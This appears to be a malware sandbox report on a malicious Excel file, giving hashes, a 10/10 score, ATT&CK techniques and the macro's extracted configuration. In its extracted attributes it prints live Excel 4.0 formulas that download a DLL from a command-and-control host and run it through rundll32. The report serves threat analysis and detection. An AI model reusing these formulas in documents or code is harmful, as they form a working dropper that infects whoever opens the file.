Resubmissions

04-03-2021 12:18

210304-lclhxp6vp6 10

23-04-2020 14:16

200423-q5tnjca8x2 10

General

  • Target

    49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.zip

  • Size

    61KB

  • Sample

    210304-lclhxp6vp6

  • MD5

    b5102277fec5cf20132d3d542cf4648e

  • SHA1

    40610a77a25e9ff604f7e6f9320e8dab8036a142

  • SHA256

    876752ccf051c21b583d504ed35353b986a38545fc8feeb399fceb3efdf035f7

  • SHA512

    eb45d4953505fe4552434c5a5fe666b4e8d83918245f31214b1c3b1ed6bb3b817f8e46725716982e4c835e55f7ab1903025672fee76e7299b5e003d86dd0dd32

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://gveejlsffxmfjlswjmfm.com/files/april23.dll

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://gveejlsffxmfjlswjmfm.com/files/april23.dll","C:\ProgramData\todxofs.dll",0,0)
    =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\ProgramData\todxofs.dll,DllRegisterServer",0,0)
    =HALT()

Extracted

  • Language

    xlm4.0

  • Source

    URLs

  • xlm40.dropper

    http://gveejlsffxmfjlswjmfm.com/files/april23.dll

Targets

    • Target

      49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls

    • Size

      76KB

    • MD5

      228003634e57d37f08787be02c0b6c14

    • SHA1

      0e71bb6f250012609c08adf74d1cec6587b6cc05

    • SHA256

      49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908

    • SHA512

      5adcc817a196ef0cfc176d089564d8d87528e0a69134287b8858907a8e97040bdbc05b0b5d87db9a9856e641673c27effc3bed5f70754e87dbbef0d64dfa1375

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Matrix (ATT&CK v6)

Defense Evasion

  • Modify Registry (T1112): 1

Discovery

  • Query Registry (T1012): 2

  • System Information Discovery (T1082): 2
